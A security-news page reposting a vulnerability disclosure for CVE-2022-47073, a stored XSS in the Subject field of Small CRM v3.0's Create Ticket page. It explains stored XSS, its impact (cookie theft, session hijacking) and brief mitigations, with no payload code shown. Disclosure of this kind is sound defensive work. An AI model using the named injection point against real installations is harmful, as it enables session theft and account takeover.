Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-47073: Stored XSS found in Small CRM (phpgurukul) - Shiva Kumar M V - Medium

A cross-site scripting (XSS) vulnerability in the Create Ticket page of Small CRM v3.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Subject parameter.

CVE
#xss#vulnerability#web#windows#php#auth

# Exploit Title: Small CRM — Stored Cross-Site Scripting Vulnerability.
# Date: 12-Nov-2022
# Exploit Author: Venkata Siva Kumar Medituru
# Vendor Homepage:
https://phpgurukul.com/****# Software Link: https://phpgurukul.com/small-crm-php/****# Version: 3.0
# Tested on: Windows 10
# Contact:
https://www.linkedin.com/in/shivakumar-m-v/

Stored XSS Vulnerability : Cross-site scripting attacks, also called XSS attacks, are a type of injection attack that injects malicious code into specific input fields. If the inputs fields are not validating or not sanitizing the user input then attacker can run malicious script that runs at server side.

Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-II XSS.

**Attack vector:
**This vulnerability can results attacker injecting the XSS payload in the Subject input Field in “Create Ticket” page and each time user visits the “View Ticket” page, the XSS triggers and the attacker can able to steal the cookie according to the crafted payload.

Vulnerable Parameter: Subject.

The Reproducive Steps are given in Video PoC.

Impact:

XSS may results to Cookie Stealing, Session Hijacking, Redirection, Account Takeovers and many malicious activities will be performed by perpetrators.

Mitigations:

  1. Implement Web Application Firewall

  2. Configure Security Headers that will validate user input and allow the request.

  3. Encode user input wherever possible.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907